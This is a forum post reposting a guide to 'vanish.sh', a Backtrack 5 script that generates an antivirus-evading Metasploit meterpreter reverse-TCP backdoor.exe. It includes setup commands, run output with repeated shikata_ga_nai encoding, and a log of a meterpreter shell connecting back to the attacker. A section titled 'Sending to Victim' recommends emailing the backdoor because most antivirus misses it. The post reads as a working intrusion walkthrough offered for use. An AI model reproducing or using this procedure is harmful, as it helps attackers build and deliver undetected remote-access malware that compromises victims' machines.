This is an Modified and Stable Version in order to work with Backtrack 5 distribution.
In order to be able to compile the generated payload we must need this package:- Mingw32 gcc-runtime
which you can install by:
Código: Seleccionar todo
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
Código: Seleccionar todo
root@bt:/pentest/exploits/framework# chmod + vanish.sh
root@bt:/pentest/exploits/framework# sh vanish.sh
************************************************************
Fully Undetectable Metasploit Payload generaor Beta
Original Concept and Script by Astr0baby
Stable Version of Script is Edited by Vanish3r
Video Tutorial by Vanish3r - www.securitylabs.in
Powered by TheHackerNews.com and securitylabs.in
************************************************************
Network Device On your Computer :
lo:
eth2:
Which Interface to use ? eth2
What Port Number are we gonna listen to? : 443
Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 7000
How many times you want to encode ? 1-20 : 14
Current Ip is : 192.168.93.1
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 560 (iteration=10)
[*] x86/shikata_ga_nai succeeded with size 587 (iteration=11)
[*] x86/shikata_ga_nai succeeded with size 614 (iteration=12)
[*] x86/shikata_ga_nai succeeded with size 641 (iteration=13)
[*] x86/shikata_ga_nai succeeded with size 668 (iteration=14)
backdoor.exe ...generated in seclabs subfolder
backdoor.exe sha1checksum is .. 94da3a4888d8158c9dafa51e2d35528d99a1e871 backdoor.exe
starting the meterpreter listener...
Vanish.sh will create a Sub folder called "seclabs" and you will find your backdoor.exe there :)
# Recommended :
Seed Number = 7000 and
Number of Encode = 14
# Sending to Victim :
You can Easily send by Email as it is Undetectable by Most of Anti-Virus or any other way
After Execution on Victim, Now our Metasploit console Shows Connection :))
Código: Seleccionar todo
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.200.22
LPORT => 443
[*] Started reverse handler on 192.168.93.1:443
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.93.2
[*] Meterpreter session 1 opened (192.168.93.1:443 -> 192.168.93.2:55865)
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
12 services.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\services.exe
17 explorer.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\explorer.exe
33 winedevice.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\winedevice.exe
8 24382.exe x86 0 NT AUTHORITY\INTERACTIVE Z:\pentest\exploits\framework\ShellCode\24382.exe
meterpreter > sysinfo
Computer : bt
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
By default Script Generates Reverse TCP Payload but you can change it by some modifications in Script [vanish.sh]
Pastebin Version : [Enlace externo eliminado para invitados]
Fuente: securitylabs